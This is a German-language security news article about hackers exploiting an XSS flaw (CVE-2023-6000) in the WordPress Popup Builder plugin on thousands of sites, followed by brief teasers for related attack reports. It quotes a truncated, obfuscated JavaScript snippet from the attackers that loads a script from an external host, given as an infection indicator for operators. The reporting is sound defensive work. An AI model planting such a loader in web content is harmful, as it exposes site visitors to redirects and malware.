Wordpress Popup-Builder: bereits 3600 ungepatchte Seiten gehackt

IEine Schwachstelle im Popup Builder-Plugin für WordPress, bekannt als CVE-2023-6000, wird von Hackern aktiv ausgenutzt und das nicht zum ersten mal. Aktuelle Statistiken von WordPress zeigen, dass mindestens 80.000 aktive Websites immer noch Popup Builder in der Version 4.1 oder älter verwenden. Über 3.600 Websites sind von der neuartigen Malware Kampagne bereits betroffen, der über eine Cross-Site-Scripting (XSS)-Vulnerabilität in Versionen 4.2.3 und älter des Plugins eingeschleust wurde. Viele der Seiten finden sich dabei in Deutschland und den Niederlanden.

Die Angreifer hinterlassen eine beunruhigende Signatur in den wp_postmeta-Tabellen der betroffenen Websites: Ein Stück JavaScript-Code, der auf eine externe Quelle verweist, wurde als Indikator für eine neue Ransomware-Form identifiziert. Darüber hinaus kann der schädliche Code in einigen Fällen, beispielsweise bei der Nutzung des Kontaktformular-Plugins Contact Form 7, zu bösartigen Weiterleitungen führen. Folgendes Codeschnipsel in der der wp_postmeta Datentabelle deutet auf eine Infektion hin:

var d = document; var e = d['create' + 'Element']('scr' + 'ipt'); e['src'] = 'https://host.clo

Website-Betreiber sind aufgerufen, ihre Systeme umgehend zu überprüfen und erforderliche Maßnahmen einzuleiten, um Ihre Webseite nicht für Cross Site Scripting Angriffe durch Hacker ausnutzen zu lassen.

Tags :

Related Posts

Gehackte Wordpress verwenden Client Browser für DDOS Angriffe

WordPress-Websites werden zunehmend Ziel von Hackerangriffen, bei denen die Browser von Besuchern für schädliche Operationen missbraucht werden. Eine kürzliche Untersuchung von Sucuri offenbart, dass Cyberkriminelle WordPress-Seiten kompromittieren, um in HTML-Vorlagen bösartigen Code einzuschleusen. Sobald ein Besucher die betroffene Website aufruft, wird dieser Code aus einer spezifischen URL in seinen Browser geladen und initiiert dort unerwünschte Aktivitäten. WordPress-Websites von Hackern dazu missbraucht, ein bösartiges Skript einzuschleusen, das die Browser der Besucher für DDoS-Angriffe (Distributed Denial of Service) gegen bestimmte Websites verwendet. Sobald geladen, zwingt das JavaScript den Browser des Besuchers dazu, HTTP GET-Anfragen an die aufgeführten Websites zu senden, ohne dass die Website-Betreiber oder die Besucher davon wissen.

Read More

Fake Zoom, Skype und Google Meet Websites verbreiten Malware

Forscher von Zscaler ThreatLabz haben kürzlich aufgedeckt, dass ein Cyberkrimineller Remote Access Trojans (RATs) über gefälschte Online-Meeting-Plattformen verbreitet und dabei Nutzer von Android- und Windows-Geräten ins Visier nimmt. Die verbreiteten RATs umfassen den SpyNote RAT für Android-Geräte sowie NjRAT und DCRat für Windows-Systeme.

Read More

Cross Site Scripting Gefahr durch User-generierte Youtube Links

In diesem Artikel wollen wir darstellen wie einfach es ist, Cross Site Scripting (XSS) per modifizierten Youtube Links durchzuführen. Die Vorraussetzungen dafür sind eine Webplattform, die es Ihren Usern erlaubt Links auf Youtube Videos anzugeben, die dann z.B. im User Profil angezeigt werden.

Read More